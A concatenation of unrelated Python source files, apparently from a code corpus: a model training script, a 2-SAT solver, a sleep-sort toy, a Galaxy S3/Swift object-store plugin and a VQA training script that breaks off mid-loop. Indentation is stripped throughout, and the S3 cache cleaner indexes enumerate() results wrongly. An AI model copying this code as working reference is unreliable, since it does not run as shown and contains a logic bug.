tokenizer = BertTokenizer.from_pretrained(args.tokenizer)
if args.use_graph:
model = graph_model(args, device, tokenizer.vocab, checkpoint)
else:
model = seq2seq_model(args, device, tokenizer.vocab, checkpoint)
if args.train_from_ignore_optim:
checkpoint = None
if args.sep_optim and args.encoder == 'bert':
optim_bert = build_optim_bert(args, model, checkpoint)
optim_other = build_optim_other(args, model, checkpoint)
optim = [optim_bert, optim_other]
else:
optim = [build_optim(args, model, checkpoint, args.warmup)]
logger.info(model)
if args.use_graph:
trainer = graph_build_trainer(args, device_id, model, optim, tokenizer)
else:
trainer = seq2seq_build_trainer(args, device_id, model, optim, tokenizer)
trainer.train(train_iter_fct, args.train_steps)
|
circuit_design V2.py | # python3
#https://www.geeksforgeeks.org/2-satisfiability-2-sat-problem/
#https://en.wikipedia.org/wiki/Tarjan%27s_strongly_connected_components_algorithm
#https://stackoverflow.com/questions/4664050/iterative-depth-first-tree-traversal-with-pre-and-post-visit-at-each-node/60803684#60803684
import sys
import threading
sys.setrecursionlimit(10**6)
threading.stack_size(2**26)
DEBUG = False
#DEBUG = True
#LOG = True
LOG = False
if DEBUG: test = open("tests\\06", "r")
def lit_to_vertex(lit):
v = (abs(lit)-1) * 2
if lit > 0: v += 1
return v
def vertex_to_lit(v):
lit = (v + 1)// 2
if v % 2 != 1:
lit *= -1
lit -= 1
return lit
class Node():
def __init__(self):
self.visited = False
self.area = None
self.pre = None
self.post = None
def DFS(x, area, g, ad, sort):
def previsit(x):
global clock
g[x].pre = clock
clock += 1
def postvisit(x):
global clock
g[x].post = clock
#quicksort
sort[clock] = x
#
clock += 1
global clock
g[x].visited = True
g[x].area = area
previsit(x)
for w in ad[x]:
if (not g[w].visited):
DFS(w, area, g, ad, sort)
postvisit(x)
return None
def getSCC(adj, R_adj, G, GR):
area = 0
global order
order = [None] * (2 * len(R_adj) + 1)
global clock
clock = 1
for v in range(len(R_adj)):
if (not GR[v].visited):
DFS(v, area, GR, R_adj, order)
area += 1
#ordered in postorder:
order = [x for x in order if x is not None]
SCC = 0
#reverse
dummy = [None] * (2 * len(R_adj) + 1)
clock = 1
for x in reversed(order):
if (not G[x].visited):
DFS(x, SCC, G, adj, dummy)
SCC += 1
return SCC
def isSatisfiable(G):
for L in range(1, n+1):
if G[lit_to_vertex(L)].area == G[lit_to_vertex(-L)].area: return False
return True
def createEdges():
edges = []
reversed_edges = []
for c in clauses:
#print("clause", c)
edges.append((lit_to_vertex(-c[0]), lit_to_vertex(c[1])))
edges.append((lit_to_vertex(-c[1]), lit_to_vertex(c[0])))
reversed_edges.append((lit_to_vertex(c[1]), lit_to_vertex(-c[0])))
reversed_edges.append((lit_to_vertex(c[0]), lit_to_vertex(-c[1])))
return edges, reversed_edges
def solve():
#global solution
solution = [None] * n
area = -1
for x in reversed(order):
#print("vertex", x,"c of scc", G[x].area)
#area = G[x].area
L = vertex_to_lit(x)
index = (abs(L)) - 1
if solution[index] is None:
if L > 0:
solution[index] = 1
else:
solution[index] = 0
return solution
def main():
global n, m, clauses
if DEBUG:
n, m = map(int, test.readline().split())
clauses = [ list(map(int, test.readline().split())) for i in range(m) ]
else:
n, m = map(int, input().split())
clauses = [ list(map(int, input().split())) for i in range(m) ]
#implication graph
edges, reversed_edges = createEdges()
adj = [[] for _ in range(2*n)]
R_adj = [[] for _ in range(2*n)]
for (a, b) in edges:
#adj[a - 1].append(b - 1)
adj[a].append(b)
for (a, b) in reversed_edges:
R_adj[a].append(b)
global clock
clock = 1
G = [Node() for i in range(len(adj))]
R = [Node() for i in range(len(R_adj))]
SCC = getSCC(adj, R_adj, G, R)
if isSatisfiable(G):
print("SATISFIABLE");
solution = solve()
print(" ".join(str(i+1 if solution[i] else -(i+1)) for i in range(n)))
else:
print("UNSATISFIABLE")
#main()
# This is to avoid stack overflow issues
threading.Thread(target=main).start()
|
sleep_sort.py | # !/usr/bin/env python3
from time import sleep
from random import randint
from threading import Thread
def target(n, value):
global sorted_list
sleep(n)
sorted_list.append(value)
unsort_list, sorted_list = [randint(-100, 100) for _ in range(randint(10, 20))], []
max_value, min_value = unsort_list[0], unsort_list[0]
print(unsort_list)
for item in unsort_list[1:]:
if max_value < item: max_value = item
elif min_value > item: min_value = item
for item in unsort_list: Thread(target=target, args=((item - min_value) / (max_value - min_value), item)).start()
sleep(1)
print(sorted_list) |
s3.py | """
Object Store plugin for the Amazon Simple Storage Service (S3)
"""
import logging
import multiprocessing
import os
import shutil
import subprocess
import threading
import time
from datetime import datetime
from galaxy.exceptions import ObjectNotFound, ObjectInvalid
from galaxy.util import string_as_bool, umask_fix_perms, safe_relpath, directory_hash_id
from galaxy.util.sleeper import Sleeper
from .s3_multipart_upload import multipart_upload
from ..objectstore import ObjectStore, convert_bytes
try:
# Imports are done this way to allow objectstore code to be used outside of Galaxy.
import boto
from boto.s3.key import Key
from boto.s3.connection import S3Connection
from boto.exception import S3ResponseError
except ImportError:
boto = None
NO_BOTO_ERROR_MESSAGE = ("S3/Swift object store configured, but no boto dependency available."
"Please install and properly configure boto or modify object store configuration.")
log = logging.getLogger( __name__ )
logging.getLogger('boto').setLevel(logging.INFO) # Otherwise boto is quite noisy
class S3ObjectStore(ObjectStore):
"""
Object store that stores objects as items in an AWS S3 bucket. A local
cache exists that is used as an intermediate location for files between
Galaxy and S3.
"""
def __init__(self, config, config_xml):
if boto is None:
raise Exception(NO_BOTO_ERROR_MESSAGE)
super(S3ObjectStore, self).__init__(config)
self.staging_path = self.config.file_path
self.transfer_progress = 0
self._parse_config_xml(config_xml)
self._configure_connection()
self.bucket = self._get_bucket(self.bucket)
# Clean cache only if value is set in galaxy.ini
if self.cache_size != -1:
# Convert GBs to bytes for comparison
self.cache_size = self.cache_size * 1073741824
# Helper for interruptable sleep
self.sleeper = Sleeper()
self.cache_monitor_thread = threading.Thread(target=self.__cache_monitor)
self.cache_monitor_thread.start()
log.info("Cache cleaner manager started")
# Test if 'axel' is available for parallel download and pull the key into cache
try:
subprocess.call('axel')
self.use_axel = True
except OSError:
self.use_axel = False
def _configure_connection(self):
log.debug("Configuring S3 Connection")
self.conn = S3Connection(self.access_key, self.secret_key)
def _parse_config_xml(self, config_xml):
try:
a_xml = config_xml.findall('auth')[0]
self.access_key = a_xml.get('access_key')
self.secret_key = a_xml.get('secret_key')
b_xml = config_xml.findall('bucket')[0]
self.bucket = b_xml.get('name')
self.use_rr = string_as_bool(b_xml.get('use_reduced_redundancy', "False"))
self.max_chunk_size = int(b_xml.get('max_chunk_size', 250))
cn_xml = config_xml.findall('connection')
if not cn_xml:
cn_xml = {}
else:
cn_xml = cn_xml[0]
self.host = cn_xml.get('host', None)
self.port = int(cn_xml.get('port', 6000))
self.multipart = string_as_bool(cn_xml.get('multipart', 'True'))
self.is_secure = string_as_bool(cn_xml.get('is_secure', 'True'))
self.conn_path = cn_xml.get('conn_path', '/')
c_xml = config_xml.findall('cache')[0]
self.cache_size = float(c_xml.get('size', -1))
self.staging_path = c_xml.get('path', self.config.object_store_cache_path)
for d_xml in config_xml.findall('extra_dir'):
self.extra_dirs[d_xml.get('type')] = d_xml.get('path')
log.debug("Object cache dir: %s", self.staging_path)
log.debug(" job work dir: %s", self.extra_dirs['job_work'])
# for multipart upload
self.s3server = {'access_key': self.access_key,
'secret_key': self.secret_key,
'is_secure': self.is_secure,
'max_chunk_size': self.max_chunk_size,
'host': self.host,
'port': self.port,
'use_rr': self.use_rr,
'conn_path': self.conn_path}
except Exception:
# Toss it back up after logging, we can't continue loading at this point.
log.exception("Malformed ObjectStore Configuration XML -- unable to continue")
raise
def __cache_monitor(self):
time.sleep(2) # Wait for things to load before starting the monitor
while self.running:
total_size = 0
# Is this going to be too expensive of an operation to be done frequently?
file_list = []
for dirpath, _, filenames in os.walk(self.staging_path):
for filename in filenames:
filepath = os.path.join(dirpath, filename)
file_size = os.path.getsize(filepath)
total_size += file_size
# Get the time given file was last accessed
last_access_time = time.localtime(os.stat(filepath)[7])
# Compose a tuple of the access time and the file path
file_tuple = last_access_time, filepath, file_size
file_list.append(file_tuple)
# Sort the file list (based on access time)
file_list.sort()
# Initiate cleaning once within 10% of the defined cache size?
cache_limit = self.cache_size * 0.9
if total_size > cache_limit:
log.info("Initiating cache cleaning: current cache size: %s; clean until smaller than: %s",
convert_bytes(total_size), convert_bytes(cache_limit))
# How much to delete? If simply deleting up to the cache-10% limit,
# is likely to be deleting frequently and may run the risk of hitting
# the limit - maybe delete additional #%?
# For now, delete enough to leave at least 10% of the total cache free
delete_this_much = total_size - cache_limit
self.__clean_cache(file_list, delete_this_much)
self.sleeper.sleep(30) # Test cache size every 30 seconds?
def __clean_cache(self, file_list, delete_this_much):
""" Keep deleting files from the file_list until the size of the deleted
files is greater than the value in delete_this_much parameter.
:type file_list: list
:param file_list: List of candidate files that can be deleted. This method
will start deleting files from the beginning of the list so the list
should be sorted accordingly. The list must contains 3-element tuples,
positioned as follows: position 0 holds file last accessed timestamp
(as time.struct_time), position 1 holds file path, and position 2 has
file size (e.g., (<access time>, /mnt/data/dataset_1.dat), 472394)
:type delete_this_much: int
:param delete_this_much: Total size of files, in bytes, that should be deleted.
"""
# Keep deleting datasets from file_list until deleted_amount does not
# exceed delete_this_much; start deleting from the front of the file list,
# which assumes the oldest files come first on the list.
deleted_amount = 0
for entry in enumerate(file_list):
if deleted_amount < delete_this_much:
deleted_amount += entry[2]
os.remove(entry[1])
# Debugging code for printing deleted files' stats
# folder, file_name = os.path.split(f[1])
# file_date = time.strftime("%m/%d/%y %H:%M:%S", f[0])
# log.debug("%s. %-25s %s, size %s (deleted %s/%s)" \
# % (i, file_name, convert_bytes(f[2]), file_date, \
# convert_bytes(deleted_amount), convert_bytes(delete_this_much)))
else:
log.debug("Cache cleaning done. Total space freed: %s", convert_bytes(deleted_amount))
return
def _get_bucket(self, bucket_name):
""" Sometimes a handle to a bucket is not established right away so try
it a few times. Raise error is connection is not established. """
for i in range(5):
try:
bucket = self.conn.get_bucket(bucket_name)
log.debug("Using cloud object store with bucket '%s'", bucket.name)
return bucket
except S3ResponseError:
try:
log.debug("Bucket not found, creating s3 bucket with handle '%s'", bucket_name)
self.conn.create_bucket(bucket_name)
except S3ResponseError:
log.exception("Could not get bucket '%s', attempt %s/5", bucket_name, i + 1)
time.sleep(2)
# All the attempts have been exhausted and connection was not established,
# raise error
raise S3ResponseError
def _fix_permissions(self, rel_path):
""" Set permissions on rel_path"""
for basedir, _, files in os.walk(rel_path):
umask_fix_perms(basedir, self.config.umask, 0o777, self.config.gid)
for filename in files:
path = os.path.join(basedir, filename)
# Ignore symlinks
if os.path.islink(path):
continue
umask_fix_perms( path, self.config.umask, 0o666, self.config.gid )
def _construct_path(self, obj, base_dir=None, dir_only=None, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False, **kwargs):
# extra_dir should never be constructed from provided data but just
# make sure there are no shenannigans afoot
if extra_dir and extra_dir != os.path.normpath(extra_dir):
log.warning('extra_dir is not normalized: %s', extra_dir)
raise ObjectInvalid("The requested object is invalid")
# ensure that any parent directory references in alt_name would not
# result in a path not contained in the directory path constructed here
if alt_name:
if not safe_relpath(alt_name):
log.warning('alt_name would locate path outside dir: %s', alt_name)
raise ObjectInvalid("The requested object is invalid")
# alt_name can contain parent directory references, but S3 will not
# follow them, so if they are valid we normalize them out
alt_name = os.path.normpath(alt_name)
rel_path = os.path.join(*directory_hash_id(obj.id))
if extra_dir is not None:
if extra_dir_at_root:
rel_path = os.path.join(extra_dir, rel_path)
else:
rel_path = os.path.join(rel_path, extra_dir)
# for JOB_WORK directory
if obj_dir:
rel_path = os.path.join(rel_path, str(obj.id))
if base_dir:
base = self.extra_dirs.get(base_dir)
return os.path.join(base, rel_path)
# S3 folders are marked by having trailing '/' so add it now
rel_path = '%s/' % rel_path
if not dir_only:
rel_path = os.path.join(rel_path, alt_name if alt_name else "dataset_%s.dat" % obj.id)
return rel_path
def _get_cache_path(self, rel_path):
return os.path.abspath(os.path.join(self.staging_path, rel_path))
def _get_transfer_progress(self):
return self.transfer_progress
def _get_size_in_s3(self, rel_path):
try:
key = self.bucket.get_key(rel_path)
if key:
return key.size
except S3ResponseError:
log.exception("Could not get size of key '%s' from S3", rel_path)
return -1
def _key_exists(self, rel_path):
exists = False
try:
# A hackish way of testing if the rel_path is a folder vs a file
is_dir = rel_path[-1] == '/'
if is_dir:
keyresult = self.bucket.get_all_keys(prefix=rel_path)
if len(keyresult) > 0:
exists = True
else:
exists = False
else:
key = Key(self.bucket, rel_path)
exists = key.exists()
except S3ResponseError:
log.exception("Trouble checking existence of S3 key '%s'", rel_path)
return False
if rel_path[0] == '/':
raise
return exists
def _in_cache(self, rel_path):
""" Check if the given dataset is in the local cache and return True if so. """
# log.debug("------ Checking cache for rel_path %s" % rel_path)
cache_path = self._get_cache_path(rel_path)
return os.path.exists(cache_path)
# TODO: Part of checking if a file is in cache should be to ensure the
# size of the cached file matches that on S3. Once the upload tool explicitly
# creates, this check sould be implemented- in the mean time, it's not
# looking likely to be implementable reliably.
# if os.path.exists(cache_path):
# # print "***1 %s exists" % cache_path
# if self._key_exists(rel_path):
# # print "***2 %s exists in S3" % rel_path
# # Make sure the size in cache is available in its entirety
# # print "File '%s' cache size: %s, S3 size: %s" % (cache_path, os.path.getsize(cache_path), self._get_size_in_s3(rel_path))
# if os.path.getsize(cache_path) == self._get_size_in_s3(rel_path):
# # print "***2.1 %s exists in S3 and the size is the same as in cache (in_cache=True)" % rel_path
# exists = True
# else:
# # print "***2.2 %s exists but differs in size from cache (in_cache=False)" % cache_path
# exists = False
# else:
# # Although not perfect decision making, this most likely means
# # that the file is currently being uploaded
# # print "***3 %s found in cache but not in S3 (in_cache=True)" % cache_path
# exists = True
# else:
# return False
def _pull_into_cache(self, rel_path):
# Ensure the cache directory structure exists (e.g., dataset_#_files/)
rel_path_dir = os.path.dirname(rel_path)
if not os.path.exists(self._get_cache_path(rel_path_dir)):
os.makedirs(self._get_cache_path(rel_path_dir))
# Now pull in the file
file_ok = self._download(rel_path)
self._fix_permissions(self._get_cache_path(rel_path_dir))
return file_ok
def _transfer_cb(self, complete, total):
self.transfer_progress += 10
def _download(self, rel_path):
try:
log.debug("Pulling key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
key = self.bucket.get_key(rel_path)
# Test if cache is large enough to hold the new file
if self.cache_size > 0 and key.size > self.cache_size:
log.critical("File %s is larger (%s) than the cache size (%s). Cannot download.",
rel_path, key.size, self.cache_size)
return False
if self.use_axel:
log.debug("Parallel pulled key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
ncores = multiprocessing.cpu_count()
url = key.generate_url(7200)
ret_code = subprocess.call("axel -a -n %s '%s'" % (ncores, url))
if ret_code == 0:
return True
else:
log.debug("Pulled key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
self.transfer_progress = 0 # Reset transfer progress counter
key.get_contents_to_filename(self._get_cache_path(rel_path), cb=self._transfer_cb, num_cb=10)
return True
except S3ResponseError:
log.exception("Problem downloading key '%s' from S3 bucket '%s'", rel_path, self.bucket.name)
return False
def _push_to_os(self, rel_path, source_file=None, from_string=None):
"""
Push the file pointed to by ``rel_path`` to the object store naming the key
``rel_path``. If ``source_file`` is provided, push that file instead while
still using ``rel_path`` as the key name.
If ``from_string`` is provided, set contents of the file to the value of
the string.
"""
try:
source_file = source_file if source_file else self._get_cache_path(rel_path)
if os.path.exists(source_file):
key = Key(self.bucket, rel_path)
if os.path.getsize(source_file) == 0 and key.exists():
log.debug("Wanted to push file '%s' to S3 key '%s' but its size is 0; skipping.", source_file, rel_path)
return True
if from_string:
key.set_contents_from_string(from_string, reduced_redundancy=self.use_rr)
log.debug("Pushed data from string '%s' to key '%s'", from_string, rel_path)
else:
start_time = datetime.now()
log.debug("Pushing cache file '%s' of size %s bytes to key '%s'", source_file, os.path.getsize(source_file), rel_path)
mb_size = os.path.getsize(source_file) / 1e6
if mb_size < 10 or (not self.multipart):
self.transfer_progress = 0 # Reset transfer progress counter
key.set_contents_from_filename(source_file,
reduced_redundancy=self.use_rr,
cb=self._transfer_cb,
num_cb=10)
else:
multipart_upload(self.s3server, self.bucket, key.name, source_file, mb_size)
end_time = datetime.now()
log.debug("Pushed cache file '%s' to key '%s' (%s bytes transfered in %s sec)",
source_file, rel_path, os.path.getsize(source_file), end_time - start_time)
return True
else:
log.error("Tried updating key '%s' from source file '%s', but source file does not exist.",
rel_path, source_file)
except S3ResponseError:
log.exception("Trouble pushing S3 key '%s' from file '%s'", rel_path, source_file)
return False
def file_ready(self, obj, **kwargs):
"""
A helper method that checks if a file corresponding to a dataset is
ready and available to be used. Return ``True`` if so, ``False`` otherwise.
"""
rel_path = self._construct_path(obj, **kwargs)
# Make sure the size in cache is available in its entirety
if self._in_cache(rel_path):
if os.path.getsize(self._get_cache_path(rel_path)) == self._get_size_in_s3(rel_path):
return True
log.debug("Waiting for dataset %s to transfer from OS: %s/%s", rel_path,
os.path.getsize(self._get_cache_path(rel_path)), self._get_size_in_s3(rel_path))
return False
def exists(self, obj, **kwargs):
in_cache = in_s3 = False
rel_path = self._construct_path(obj, **kwargs)
# Check cache
if self._in_cache(rel_path):
in_cache = True
# Check S3
in_s3 = self._key_exists(rel_path)
# log.debug("~~~~~~ File '%s' exists in cache: %s; in s3: %s" % (rel_path, in_cache, in_s3))
# dir_only does not get synced so shortcut the decision
dir_only = kwargs.get('dir_only', False)
base_dir = kwargs.get('base_dir', None)
if dir_only:
if in_cache or in_s3:
return True
# for JOB_WORK directory
elif base_dir:
if not os.path.exists(rel_path):
os.makedirs(rel_path)
return True
else:
return False
# TODO: Sync should probably not be done here. Add this to an async upload stack?
if in_cache and not in_s3:
self._push_to_os(rel_path, source_file=self._get_cache_path(rel_path))
return True
elif in_s3:
return True
else:
return False
def create(self, obj, **kwargs):
if not self.exists(obj, **kwargs):
# Pull out locally used fields
extra_dir = kwargs.get('extra_dir', None)
extra_dir_at_root = kwargs.get('extra_dir_at_root', False)
dir_only = kwargs.get('dir_only', False)
alt_name = kwargs.get('alt_name', None)
# Construct hashed path
rel_path = os.path.join(*directory_hash_id(obj.id))
# Optionally append extra_dir
if extra_dir is not None:
if extra_dir_at_root:
rel_path = os.path.join(extra_dir, rel_path)
else:
rel_path = os.path.join(rel_path, extra_dir)
# Create given directory in cache
cache_dir = os.path.join(self.staging_path, rel_path)
if not os.path.exists(cache_dir):
os.makedirs(cache_dir)
# Although not really necessary to create S3 folders (because S3 has
# flat namespace), do so for consistency with the regular file system
# S3 folders are marked by having trailing '/' so add it now
# s3_dir = '%s/' % rel_path
# self._push_to_os(s3_dir, from_string='')
# If instructed, create the dataset in cache & in S3
if not dir_only:
rel_path = os.path.join(rel_path, alt_name if alt_name else "dataset_%s.dat" % obj.id)
open(os.path.join(self.staging_path, rel_path), 'w').close()
self._push_to_os(rel_path, from_string='')
def empty(self, obj, **kwargs):
if self.exists(obj, **kwargs):
return bool(self.size(obj, **kwargs) > 0)
else:
raise ObjectNotFound( 'objectstore.empty, object does not exist: %s, kwargs: %s'
% ( str( obj ), str( kwargs ) ) )
def size(self, obj, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
if self._in_cache(rel_path):
try:
return os.path.getsize(self._get_cache_path(rel_path))
except OSError as ex:
log.info("Could not get size of file '%s' in local cache, will try S3. Error: %s", rel_path, ex)
elif self.exists(obj, **kwargs):
return self._get_size_in_s3(rel_path)
log.warning("Did not find dataset '%s', returning 0 for size", rel_path)
return 0
def delete(self, obj, entire_dir=False, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
extra_dir = kwargs.get('extra_dir', None)
base_dir = kwargs.get('base_dir', None)
dir_only = kwargs.get('dir_only', False)
obj_dir = kwargs.get('obj_dir', False)
try:
# Remove temparory data in JOB_WORK directory
if base_dir and dir_only and obj_dir:
shutil.rmtree(os.path.abspath(rel_path))
return True
# For the case of extra_files, because we don't have a reference to
# individual files/keys we need to remove the entire directory structure
# with all the files in it. This is easy for the local file system,
# but requires iterating through each individual key in S3 and deleing it.
if entire_dir and extra_dir:
shutil.rmtree(self._get_cache_path(rel_path))
results = self.bucket.get_all_keys(prefix=rel_path)
for key in results:
log.debug("Deleting key %s", key.name)
key.delete()
return True
else:
# Delete from cache first
os.unlink(self._get_cache_path(rel_path))
# Delete from S3 as well
if self._key_exists(rel_path):
key = Key(self.bucket, rel_path)
log.debug("Deleting key %s", key.name)
key.delete()
return True
except S3ResponseError:
log.exception("Could not delete key '%s' from S3", rel_path)
except OSError:
log.exception('%s delete error', self.get_filename(obj, **kwargs))
return False
def get_data(self, obj, start=0, count=-1, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
# Check cache first and get file if not there
if not self._in_cache(rel_path):
self._pull_into_cache(rel_path)
# Read the file content from cache
data_file = open(self._get_cache_path(rel_path), 'r')
data_file.seek(start)
content = data_file.read(count)
data_file.close()
return content
def get_filename(self, obj, **kwargs):
base_dir = kwargs.get('base_dir', None)
dir_only = kwargs.get('dir_only', False)
obj_dir = kwargs.get('obj_dir', False)
rel_path = self._construct_path(obj, **kwargs)
# for JOB_WORK directory
if base_dir and dir_only and obj_dir:
return os.path.abspath(rel_path)
cache_path = self._get_cache_path(rel_path)
# S3 does not recognize directories as files so cannot check if those exist.
# So, if checking dir only, ensure given dir exists in cache and return
# the expected cache path.
# dir_only = kwargs.get('dir_only', False)
# if dir_only:
# if not os.path.exists(cache_path):
# os.makedirs(cache_path)
# return cache_path
# Check if the file exists in the cache first
if self._in_cache(rel_path):
return cache_path
# Check if the file exists in persistent storage and, if it does, pull it into cache
elif self.exists(obj, **kwargs):
if dir_only: # Directories do not get pulled into cache
return cache_path
else:
if self._pull_into_cache(rel_path):
return cache_path
# For the case of retrieving a directory only, return the expected path
# even if it does not exist.
# if dir_only:
# return cache_path
raise ObjectNotFound( 'objectstore.get_filename, no cache_path: %s, kwargs: %s'
% ( str( obj ), str( kwargs ) ) )
# return cache_path # Until the upload tool does not explicitly create the dataset, return expected path
def update_from_file(self, obj, file_name=None, create=False, **kwargs):
if create:
self.create(obj, **kwargs)
if self.exists(obj, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
# Chose whether to use the dataset file itself or an alternate file
if file_name:
source_file = os.path.abspath(file_name)
# Copy into cache
cache_file = self._get_cache_path(rel_path)
try:
if source_file != cache_file:
# FIXME? Should this be a `move`?
shutil.copy2(source_file, cache_file)
self._fix_permissions(cache_file)
except OSError:
log.exception("Trouble copying source file '%s' to cache '%s'", source_file, cache_file)
else:
source_file = self._get_cache_path(rel_path)
# Update the file on S3
self._push_to_os(rel_path, source_file)
else:
raise ObjectNotFound( 'objectstore.update_from_file, object does not exist: %s, kwargs: %s'
% ( str( obj ), str( kwargs ) ) )
def get_object_url(self, obj, **kwargs):
if self.exists(obj, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
try:
key = Key(self.bucket, rel_path)
return key.generate_url(expires_in=86400) # 24hrs
except S3ResponseError:
log.exception("Trouble generating URL for dataset '%s'", rel_path)
return None
def get_store_usage_percent(self):
return 0.0
class SwiftObjectStore(S3ObjectStore):
"""
Object store that stores objects as items in a Swift bucket. A local
cache exists that is used as an intermediate location for files between
Galaxy and Swift.
"""
def _configure_connection(self):
log.debug("Configuring Swift Connection")
self.conn = boto.connect_s3(aws_access_key_id=self.access_key,
aws_secret_access_key=self.secret_key,
is_secure=self.is_secure,
host=self.host,
port=self.port,
calling_format=boto.s3.connection.OrdinaryCallingFormat(),
path=self.conn_path)
|
train_vqa.py | # Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import h5py
import time
import argparse
import numpy as np
import os, sys, json
import torch
from torch.autograd import Variable
torch.backends.cudnn.enabled = False
import torch.multiprocessing as mp
from models import VqaLstmModel, VqaLstmCnnAttentionModel
from data import EqaDataset, EqaDataLoader
from metrics import VqaMetric
from models import get_state, repackage_hidden, ensure_shared_grads
from data import load_vocab
import pdb
def eval(rank, args, shared_model):
torch.cuda.set_device(args.gpus.index(args.gpus[rank % len(args.gpus)]))
if args.input_type == 'ques':
model_kwargs = {'vocab': load_vocab(args.vocab_json)}
model = VqaLstmModel(**model_kwargs)
elif args.input_type == 'ques,image':
model_kwargs = {'vocab': load_vocab(args.vocab_json)}
model = VqaLstmCnnAttentionModel(**model_kwargs)
lossFn = torch.nn.CrossEntropyLoss().cuda()
eval_loader_kwargs = {
'questions_h5': getattr(args, args.eval_split + '_h5'),
'data_json': args.data_json,
'vocab': args.vocab_json,
'batch_size': 1,
'input_type': args.input_type,
'num_frames': args.num_frames,
'split': args.eval_split,
'max_threads_per_gpu': args.max_threads_per_gpu,
'gpu_id': args.gpus[rank%len(args.gpus)],
'to_cache': args.to_cache
}
eval_loader = EqaDataLoader(**eval_loader_kwargs)
print('eval_loader has %d samples' % len(eval_loader.dataset))
args.output_log_path = os.path.join(args.log_dir,
'eval_' + str(rank) + '.json')
t, epoch, best_eval_acc = 0, 0, 0
while epoch < int(args.max_epochs):
model.load_state_dict(shared_model.state_dict())
model.eval()
metrics = VqaMetric(
info={'split': args.eval_split},
metric_names=[
'loss', 'accuracy', 'mean_rank', 'mean_reciprocal_rank'
],
log_json=args.output_log_path)
if args.input_type == 'ques':
for batch in eval_loader:
t += 1
model.cuda()
idx, questions, answers = batch
questions_var = Variable(questions.cuda())
answers_var = Variable(answers.cuda())
scores = model(questions_var)
loss = lossFn(scores, answers_var)
# update metrics
accuracy, ranks = metrics.compute_ranks(
scores.data.cpu(), answers)
metrics.update([loss.data[0], accuracy, ranks, 1.0 / ranks])
print(metrics.get_stat_string(mode=0))
elif args.input_type == 'ques,image':
done = False
all_envs_loaded = eval_loader.dataset._check_if_all_envs_loaded()
while done == False:
for batch in eval_loader:
t += 1
model.cuda()
idx, questions, answers, images, _, _, _ = batch
questions_var = Variable(questions.cuda())
answers_var = Variable(answers.cuda())
images_var = Variable(images.cuda())
scores, att_probs = model(images_var, questions_var)
loss = lossFn(scores, answers_var)
# update metrics
accuracy, ranks = metrics.compute_ranks(
scores.data.cpu(), answers)
metrics.update(
[loss.data[0], accuracy, ranks, 1.0 / ranks])
print(metrics.get_stat_string(mode=0))
if all_envs_loaded == False:
eval_loader.dataset._load_envs()
if len(eval_loader.dataset.pruned_env_set) == 0:
done = True
else:
done = True
epoch += 1
# checkpoint if best val accuracy
if metrics.metrics[1][0] > best_eval_acc:
best_eval_acc = metrics.metrics[1][0]
if epoch % args.eval_every == 0 and args.to_log == 1:
metrics.dump_log()
model_state = get_state(model)
if args.checkpoint_path != False:
ad = checkpoint['args']
else:
ad = args.__dict__
checkpoint = {'args': ad, 'state': model_state, 'epoch': epoch}
checkpoint_path = '%s/epoch_%d_accuracy_%.04f.pt' % (
args.checkpoint_dir, epoch, best_eval_acc)
print('Saving checkpoint to %s' % checkpoint_path)
torch.save(checkpoint, checkpoint_path)
print('[best_eval_accuracy:%.04f]' % best_eval_acc)
def train(rank, args, shared_model):
torch.cuda.set_device(args.gpus.index(args.gpus[rank % len(args.gpus)]))
if args.input_type == 'ques':
model_kwargs = {'vocab': load_vocab(args.vocab_json)}
model = VqaLstmModel(**model_kwargs)
elif args.input_type == 'ques,image':
model_kwargs = {'vocab': load_vocab(args.vocab_json)}
model = VqaLstmCnnAttentionModel(**model_kwargs)
lossFn = torch.nn.CrossEntropyLoss().cuda()
optim = torch.optim.Adam(
filter(lambda p: p.requires_grad, shared_model.parameters()),
lr=args.learning_rate)
train_loader_kwargs = {
'questions_h5': args.train_h5,
'data_json': args.data_json,
'vocab': args.vocab_json,
'batch_size': args.batch_size,
'input_type': args.input_type,
'num_frames': args.num_frames,
'split': 'train',
'max_threads_per_gpu': args.max_threads_per_gpu,
'gpu_id': args.gpus[rank%len(args.gpus)],
'to_cache': args.to_cache
}
args.output_log_path = os.path.join(args.log_dir,
'train_' + str(rank) + '.json')
metrics = VqaMetric(
info={'split': 'train',
'thread': rank},
metric_names=['loss', 'accuracy', 'mean_rank', 'mean_reciprocal_rank'],
log_json=args.output_log_path)
train_loader = EqaDataLoader(**train_loader_kwargs)
if args.input_type == 'ques,image':
train_loader.dataset._load_envs(start_idx=0, in_order=True)
print('train_loader has %d samples' % len(train_loader.dataset))
t, epoch = 0, 0
while epoch < int(args.max_epochs):
if args.input_type == 'ques':
for batch in train_loader:
t += 1
model.load_state_dict(shared_model.state_dict())
model.train()
model.cuda()
idx, questions, answers = batch
questions_var = Variable(questions.cuda())
answers_var = Variable(answers.cuda())
scores = model(questions_var)
loss = lossFn(scores, answers_var)
# zero grad
optim.zero_grad()
# update metrics
accuracy, ranks = metrics.compute_ranks(scores.data.cpu(), answers)
metrics.update([loss.data[0], accuracy, ranks, 1.0 / ranks])
# backprop and update
loss.backward()
ensure_shared_grads(model.cpu(), shared_model)
optim.step()
if t % args.print_every == 0:
print(metrics.get_stat_string())
if args.to_log == 1:
metrics.dump_log()
elif args.input_type == 'ques,image':
done = False
all_envs_loaded = train_loader.dataset._check_if_all_envs_loaded()
while done == False:
for batch in train_loader:
t += 1
model.load_state_dict(shared_model.state_dict())
model.train()
model.cuda()
idx, questions, answers, images, _, _, _ = batch
questions_var = Variable(questions.cuda())
answers_var = Variable(answers.cuda())
images_var = Variable(images.cuda())
scores, att_probs = model(images_var, questions_var)
loss = lossFn(scores, answers_var)
# zero grad
optim.zero_grad()
# update metrics
accuracy, ranks = metrics.compute_ranks(scores.data.cpu(), answers)
metrics.update([loss.data[0], accuracy, ranks, 1.0 / ranks])
# backprop and update
loss.backward()
ensure_shared_grads(model.cpu(), shared_model)
optim.step()
if t % args.print_every == 0:
print(metrics.get_stat_string())
if args.to_log == 1:
